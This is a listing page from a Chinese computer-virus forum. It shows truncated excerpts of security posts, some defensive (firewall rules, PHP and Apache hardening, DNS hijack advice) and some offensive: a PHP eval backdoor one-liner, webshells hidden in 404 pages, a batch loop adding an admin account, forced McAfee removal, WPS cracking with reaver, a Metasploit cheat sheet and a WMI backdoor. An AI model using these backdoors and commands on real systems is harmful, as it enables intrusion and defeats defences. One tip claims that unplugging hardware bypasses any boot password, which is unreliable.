电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

远程连接到网络资源已经成为现代企业很多员工的工作需要。无论这种连接是通过VPN、远程桌面还是安全壳(SSH)进行的，这种连接将不可避免地穿过装载着路由器、交换机和防火墙的网络，而这些设备中有很多都很容易受到攻击。 安全行业的企业和管理人员都意识到了这个问题，攻击者也意识到这些设备中存在漏洞，任何具有基本网络 ...

作者：phpeval 前段时间一个程序出的问题。就和这差不多。 复制代码代码如下:<?php$code="${${eval($_GET[c])}}";?> 对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码被执行了。 (好些PHP的代码在写文件 ...

即使在经历了无数的黑客盗密事件之后，还是有很多人不知从中吸取教训，抑或是很多人根本不在意自己的账号密码是否安全！他们一直用着最简单最易记的密码，而这些往往也是账号密码被盗的主要原因。那么，你知道容易被盗，但又十分受欢迎的密码都有哪些吗？本文将为你揭开谜底。 10月4日，报道称Adobe公司系统遭黑客入侵，被 ...

在正式进行各种“黑客行为”之前，黑客会采取各种手段，探测(也可以说“侦察”)对方的主机信息，以便决定使用何种最有效的方法达到自己的目的。 “IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的方法较多，黑客也会因不同的网络情况采取不同的方法，如：在局域网内使用 Ping指令 ...

　　Flash Cookie比浏览器Cookie容量更大，可以跨浏览器对不同Cookies进行身份剔重，但是不易删除。让我们一起来看看如何关闭Flash Cookie吧： 　　1.用户打开一个新的浏览器窗口,在浏览器中输入如下网址： 　　http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html 　　2.打开网 ...

需要工具：reaver安装： 下载源码从这个网址下载reaver源代码http://code.google.com/p/reaver-wpswget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz  解压tar-xzvf reaver-1.4.tar.gz 安装必要的软件依赖库和工具在您编译reaver前需要先安装pcaplib等工具，后面还需要aircrack-ngsudo&n ...

有的网站被恶意放上UDP发包工具攻击别人 导致流量大量流失 一般服务器只有DNS使用udp协议，其它则可禁用UDP数据包外出 为此写了个脚本只允许目标DNS服务器的UDP数据包外出 其它UDP数据包全部拒绝 本方法仅能做到防止恶意UDP数据包发出 服务器本身做好安全设置防止被恶意放马才是王道。 复制代码代码如下: #/bin/bash #Creat ...

前几天发现的，略无语，因为简单到。。 直接在命令行下使用 for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add  另存为 ad.bat 使用 for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add  命令的意思是循环一千次执行 ...

安全区的定义在建立安全网络过程中起着至关重要的作用。DMZ (Demilitarized Zone)是网络安全中最重要的分区术语。因为DMZ包含设备性质，所以将其同网络的其他部分分隔开来。这些设备通常是需要从公共网络上去访问的服务器，不允许在它们所在的区域实现太严格的安全策略，因而需要分离开来。 DMZ通常是驻留于专用网络和公共 ...

百毒不侵，权限这样设 我们知道病毒等恶意程序经常把自己隐藏在windows(反健设置权限)系统目录中，如果对他的权限进行下设置，能够防止绝大部分的病毒。首先，确定你的系统目录没有任何病毒；右键单击c:windows-属性-安全，删除administrators和system以外的所有用户组，然后再去掉administrators和system的“完全控制 ...

show exploits 查找metasploit框架中所有的其他模块。info 你本地可以让目标主机连接的IP地址，通常当目标主机不在同一个局域网内时，就需要是一个公共IP地址，特别为反弹式shell使用。RHOST 远程主机或是目标主机。set function 设置特定的配置参数（EG：设置本地或远程主机参数）。setg function 以全局方式设置特定的配 ...

      碰到电脑就像玩一会，但是，电脑开机需要密码怎么办？现在教你小小一招巧解任何电脑的开机密码，       无需任何工具，无需放电。      任何电脑当开机需要密码时，只需将机箱打开，把里面的声卡或其它任何一 个零件拔下来，然后通电 ...

1、首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的 web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行： php_admin_value open_basedir /usr/local/apache/htdocs 这样，如果脚本要读取/usr/local/apache/htdocs以外的文件将不 ...

网站域名被劫持，网站dns被劫持，域名跳转到别的网站怎么解决？          网站域名被劫持，网站dns被劫持，域名跳转到别的网站怎么解决？   出现网站域名跳转到其他网站，这一现象很可能是域名被劫持。 【网站域名被劫持——概念】     简单来说，域名劫 ...

1、控制面板中-添加或删除程序中-删除"McAfee VirusScan Enterprise"和"McAfee AntiSpyware Enterprise Module" 2、控制面板中-管理工具-服务-停止MCAFEE FRAMEWORK MANAGER服务 3、开始中—运行—输入cmd—输入"C:\Program Files\McAfee\Common Framework\frminst.exe" /forceuninstall (注意包含引号，以 ...

强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马： 复制代码代码如下:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 N ...

　　现在比特币的价格涨得很高，所以现在有黑客专门制造挖矿木马来诱导网友，从而达到控制电脑上的显卡来挖掘比特币。为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高。如果你是一位 3D 游戏玩家，正好中了比特币挖矿木马，就会发现在玩游戏时会非常卡顿。下面介绍一些简单的预防方法。 　 ...

最近看到网上曝出的dedecms最新版本的一个注入漏洞利用，漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中，发现无法复现。原因是此漏洞的利用需要一定的前提条件，而原分析文章当中并没有交代这些，所以这里将我的分析过程以及一些触发的必要条件总结了一下。 一. 漏洞跟踪 发布时间：2013年6月7日 漏洞描述： D ...

*net user 查看用户列表　　*net user 用户名 密码 /add 添加用户　　*net user 用户名 密码 更改用户密码　　*net localgroup administrators 用户名 /add 添加用户到管理组　　*net user 用户名 /delete 删除用户　　*net user 用户名 查看用户的基本情况　　*net user 用户名 /active:no 禁用该用户　　*net user 用户名 ...

来源：菠萝的菠萝格 Welcome!各位ScriptKid，欢迎来到脚本世界。 今天忙了一天，比较累。不废话那么多了，切入正题。 这个“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer（以下简称ASEC）。WMI中有许多这 类的事件消费者，简单的来说，当与其绑定的事件到达时，消费者就会被触发执行预先 ...